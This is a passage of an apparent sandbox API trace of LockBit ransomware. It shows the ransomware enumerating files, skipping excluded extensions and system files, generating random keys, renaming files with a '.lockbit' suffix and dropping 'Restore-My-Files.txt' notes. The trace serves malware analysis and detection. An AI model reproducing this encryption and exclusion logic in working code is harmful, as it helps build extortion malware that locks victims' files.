(lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.883] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.883] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0157.883] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0157.888] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.888] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.888] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.889] free (_Block=0x1fa2ed8) [0157.889] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309480.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.890] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.890] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.890] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66162910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x544c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309567.JPG", cAlternateFileName="")) returned 1 [0157.890] lstrcmpiW (lpString1=".", lpString2="J0309567.JPG") returned -1 [0157.890] lstrcmpiW (lpString1="..", lpString2="J0309567.JPG") returned -1 [0157.890] PathFindExtensionW (pszPath="J0309567.JPG") returned=".JPG" [0157.890] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0157.890] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0157.890] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0157.890] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0157.890] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0157.890] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0157.890] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0157.890] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0157.890] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0157.891] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0157.891] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0157.892] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0157.892] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0157.892] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0157.892] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0157.892] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.892] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0157.892] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0157.892] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0157.893] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0157.893] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309567.JPG") returned 1 [0157.893] lstrcmpiW (lpString1="ntldr", lpString2="J0309567.JPG") returned 1 [0157.893] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309567.JPG") returned 1 [0157.893] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309567.JPG") returned -1 [0157.893] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309567.JPG") returned -1 [0157.893] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309567.JPG") returned 1 [0157.893] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309567.JPG") returned -1 [0157.893] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.893] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG") returned=".JPG" [0157.893] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0157.893] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0157.893] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0157.893] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0157.893] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0157.893] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0157.894] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0157.894] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0157.894] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0157.894] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0157.894] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0157.895] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0157.895] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG.lockbit") returned 72 [0157.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309567.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0157.900] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.901] malloc (_Size=0x40068) returned 0x1ff1e60 [0157.901] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=21580) returned 1 [0157.901] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0157.902] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.902] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.902] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0157.902] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0157.905] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.905] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.905] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.907] free (_Block=0x1fa2ed8) [0157.907] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309567.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.907] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.907] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.907] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x9a8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309585.JPG", cAlternateFileName="")) returned 1 [0157.907] lstrcmpiW (lpString1=".", lpString2="J0309585.JPG") returned -1 [0157.908] lstrcmpiW (lpString1="..", lpString2="J0309585.JPG") returned -1 [0157.908] PathFindExtensionW (pszPath="J0309585.JPG") returned=".JPG" [0157.908] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0157.908] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0157.908] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0157.908] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0157.908] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0157.908] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0157.908] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0157.908] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0157.908] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0157.909] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0157.909] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0157.910] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0157.910] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0157.910] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0157.910] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0157.910] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0157.910] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0157.910] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.910] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0157.910] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0157.910] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0157.910] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0157.910] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309585.JPG") returned 1 [0157.910] lstrcmpiW (lpString1="ntldr", lpString2="J0309585.JPG") returned 1 [0157.910] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309585.JPG") returned 1 [0157.910] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0309585.JPG") returned -1 [0157.910] lstrcmpiW (lpString1="autorun.inf", lpString2="J0309585.JPG") returned -1 [0157.910] lstrcmpiW (lpString1="thumbs.db", lpString2="J0309585.JPG") returned 1 [0157.910] lstrcmpiW (lpString1="iconcache.db", lpString2="J0309585.JPG") returned -1 [0157.910] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.910] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG") returned=".JPG" [0157.911] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0157.911] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0157.911] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0157.911] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0157.911] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0157.911] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0157.911] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0157.911] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0157.912] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0157.912] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG.lockbit") returned 72 [0157.912] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0309585.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0157.913] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.913] malloc (_Size=0x40068) returned 0x3f70048 [0157.913] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=39563) returned 1 [0157.913] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0157.914] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.914] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.914] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0157.914] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0157.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.920] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.920] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.921] free (_Block=0x1fa2ed8) [0157.921] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0309585.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.921] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.921] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.922] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5674c1b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0309598.JPG", cAlternateFileName="")) returned 1 [0157.922] lstrcmpiW (lpString1=".", lpString2="J0309598.JPG") returned -1 [0157.922] lstrcmpiW (lpString1="..", lpString2="J0309598.JPG") returned -1 [0157.922] PathFindExtensionW (pszPath="J0309598.JPG") returned=".JPG" [0157.922] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0157.922] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0157.922] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0157.922] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0157.922] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0157.922] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0157.922] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0157.923] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0157.923] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0157.924] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0157.924] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0157.924] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0157.924] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0157.924] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0157.924] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0157.924] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0309598.JPG") returned 1 [0157.924] lstrcmpiW (lpString1="ntldr", lpString2="J0309598.JPG") returned 1 [0157.924] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0309598.JPG") returned 1 [0157.924] lstrcmpiW (lpString1="bootsect.bak", 